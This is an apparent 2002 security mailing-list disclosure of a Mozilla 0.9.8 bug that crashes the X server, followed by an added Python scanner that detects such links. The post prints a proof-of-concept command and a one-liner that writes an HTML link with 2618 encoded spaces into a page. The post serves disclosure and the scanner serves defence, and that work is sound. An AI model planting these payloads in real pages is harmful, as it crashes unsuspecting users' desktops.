From: Replugge [Rod] (repluggealcoholico.org)
Date: Sun Feb 17 2002 - 10:24:28 CST

    NOTE TO THE MODERATOR: This was sent yesterday but I guess it didn't
    make it, since this doesn't seem to affect Red Hat itself; it affects
    the mozilla packages distributed by Ximian:

    The test system looks like:

    bash#~ rpm -qa | grep mozilla
    mozilla-0.9.8-1.ximian.2
    mozilla-mail-0.9.8-1.ximian.2
    mozilla-xmlterm-0.9.8-1.ximian.2
    mozilla-devel-0.9.8-1.ximian.2
    nautilus-mozilla-1.0.6-ximian.4
    mozilla-psm-0.9.8-1.ximian.2
    kdebindings-kmozilla-2.1.1-1

    This was tested on both RH7.1 and 7.2 with Ximian Gnome (with all
    the updates).

    There is a bug in mozilla 0.9.8-1 which allows you
    to crash the X server.

    I won't go into details I'll just show the proof
    of concept.

    exploit:

    Local:
    bash#~ mozilla `perl -e "print '%20' x 2618"`

    Remote:
    I haven't tested this but I guess:

    echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> ./attack.html

    perhaps using "img src" or JavaScript...

    Best Regards

    -- 
    /* 
    Rodrigo Gutierrez                   <rodrigotrustix.com>
    Trustix AS                         http://www.trustix.com 
    */
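
A defensive check for the pattern in the message above, as an added example that is not part of the original post: it scans HTML for `href`/`src` values whose host part is a long run of `%20` or exceeds the 253-character DNS name limit. The names `suspicious_reason`, `LinkAuditor` and `scan_html`, the 8-repeat threshold, and the treatment of a scheme-less string as a would-be host are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

MAX_HOST_LEN = 253                          # longest DNS name in text form
PCT_SPACE_RUN = re.compile(r"(?:%20){8,}")  # assumed threshold: 8+ encoded spaces
URL_ATTRS = {"href", "src"}                 # attributes the post mentions


def suspicious_reason(url):
    """Return why the URL's host part looks malformed, or None if it looks fine."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparseable URL"
    # A bare command-line argument has no scheme; treat its first path
    # segment as the would-be host (assumption about browser URL fix-up).
    fallback = "" if parts.scheme else parts.path.partition("/")[0]
    host = parts.netloc or fallback
    if PCT_SPACE_RUN.search(host):
        return "run of encoded spaces in host"
    if len(host) > MAX_HOST_LEN:
        return "host longer than %d characters" % MAX_HOST_LEN
    return None


class LinkAuditor(HTMLParser):
    """Collect (tag, attribute, reason) for every suspicious href/src value."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                reason = suspicious_reason(value)
                if reason:
                    self.findings.append((tag, name, reason))


def scan_html(markup):
    """Parse markup and return the list of findings."""
    auditor = LinkAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    # Constructed sample mirroring the shape of the link in the post.
    sample = ("<a href=http://" + "%20" * 2618 + ">attack_me</a>"
              '<img src="http://example.com/a%20b.png">')
    print(scan_html(sample))
```
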